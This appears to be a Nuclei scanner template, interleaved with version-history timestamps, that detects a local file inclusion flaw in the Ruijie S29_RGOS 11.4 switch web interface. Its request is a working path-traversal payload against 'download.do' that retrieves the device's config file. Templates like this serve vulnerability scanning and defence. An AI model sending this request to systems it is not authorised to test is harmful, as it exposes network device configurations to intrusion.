2021-03-01 10:21:32 +00:00
id : ruijie-networks-lfi
info :
2022-08-05 13:57:51 +00:00
name : Ruijie Networks Switch eWeb S29_RGOS 11.4 - Local File Inclusion
2021-03-01 10:21:32 +00:00
author : pikpikcu
severity : high
2022-08-05 13:57:51 +00:00
description : Ruijie Networks Switch eWeb S29_RGOS 11.4 is vulnerable to local file inclusion and allows remote unauthenticated attackers to access locally stored files and retrieve their content via the 'download.do' endpoint.
2022-04-22 10:38:41 +00:00
reference :
- https://exploit-db.com/exploits/48755
2022-08-05 13:57:51 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cwe-id : CWE-22
2022-08-27 04:41:18 +00:00
tags : ruijie,lfi,edb
2021-03-01 10:21:32 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/download.do?file=../../../../config.text"
matchers-condition : and
matchers :
- type : word
words :
- 'filename="config.text"'
- "Content-Type: application/octet-stream"
part : header
- type : word
words :
- "version S29_RGOS 11.4"
part : body
condition : and
- type : status
status :
- 200
2022-08-05 13:57:51 +00:00
# Enhanced by mp on 2022/08/04